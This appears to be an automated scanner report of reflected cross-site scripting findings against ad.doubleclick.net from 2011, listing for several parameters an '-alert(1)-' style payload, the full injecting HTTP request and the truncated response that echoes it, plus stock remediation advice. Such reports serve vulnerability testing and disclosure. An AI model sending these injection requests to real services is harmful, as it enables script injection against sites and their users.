document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:38:57 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQBe6f88'-alert(1)-'5d816f81708&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B39213497\"> ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e89c3"-alert(1)-"ea8dd10c3f1 was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQBe89c3"-alert(1)-"ea8dd10c3f1&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7891
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:08:55 GMT
Expires: Thu, 03 Feb 2011 16:08:55 GMT
Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQBe89c3"-alert(1)-"ea8dd10c3f1&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B40155604"); var fscUrl = url; ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1934"-alert(1)-"9335474a73d was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073b1934"-alert(1)-"9335474a73d&adurl=;ord=1145778283?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7891
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:09:00 GMT
Expires: Thu, 03 Feb 2011 16:09:00 GMT
Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073b1934"-alert(1)-"9335474a73d&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B40155604"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0bb5'-alert(1)-'b56bd520db3 was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073f0bb5'-alert(1)-'b56bd520db3&adurl=;ord=1145778283?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7891
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:09:01 GMT
Expires: Thu, 03 Feb 2011 16:09:01 GMT
Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073f0bb5'-alert(1)-'b56bd520db3&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B40155604\"> ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af15d"-alert(1)-"24557353392 was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1af15d"-alert(1)-"24557353392&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7857
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:08:56 GMT
Expires: Thu, 03 Feb 2011 16:08:56 GMT
Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:38:57 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... j0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1af15d"-alert(1)-"24557353392&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B39213497"); var fscUrl = url; var f ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f94ae'-alert(1)-'43c15411da1 was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1f94ae'-alert(1)-'43c15411da1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7891
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:08:56 GMT
Expires: Thu, 03 Feb 2011 16:08:56 GMT
Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... j0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1f94ae'-alert(1)-'43c15411da1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B40155604\"> ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23ee8'-alert(1)-'ebf157e0bd6 was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q23ee8'-alert(1)-'ebf157e0bd6&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7891
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:08:59 GMT
Expires: Thu, 03 Feb 2011 16:08:59 GMT
Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q23ee8'-alert(1)-'ebf157e0bd6&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B40155604\"> ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4ef6"-alert(1)-"6c82ad39022 was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Qe4ef6"-alert(1)-"6c82ad39022&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7857
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:08:58 GMT
Expires: Thu, 03 Feb 2011 16:08:58 GMT
Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:38:57 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Qe4ef6"-alert(1)-"6c82ad39022&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B39213497"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b4c51'-alert(1)-'a046432a509 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=lb4c51'-alert(1)-'a046432a509&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7891
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:08:53 GMT
Expires: Thu, 03 Feb 2011 16:08:53 GMT
Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... k\" href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/23c/%2a/k%3B234019457%3B1-0%3B0%3B57865897%3B2321-160/600%3B40155604/40173391/4%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=lb4c51'-alert(1)-'a046432a509&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2Nt ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95ce4"-alert(1)-"4bb60c57e4a was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l95ce4"-alert(1)-"4bb60c57e4a&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 7891 Cache-Control: no-cache Pragma: no-cache Date: Thu, 03 Feb 2011 16:08:53 GMT Expires: Thu, 03 Feb 2011 16:08:53 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/23c/%2a/k%3B234019457%3B1-0%3B0%3B57865897%3B2321-160/600%3B40155604/40173391/4%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l95ce4"-alert(1)-"4bb60c57e4a&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2Nt ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d464"-alert(1)-"0d57c46e691 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=9d464"-alert(1)-"0d57c46e691 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 7515 Cache-Control: no-cache Pragma: no-cache Date: Thu, 03 Feb 2011 16:06:25 GMT Expires: Thu, 03 Feb 2011 16:06:25 GMT
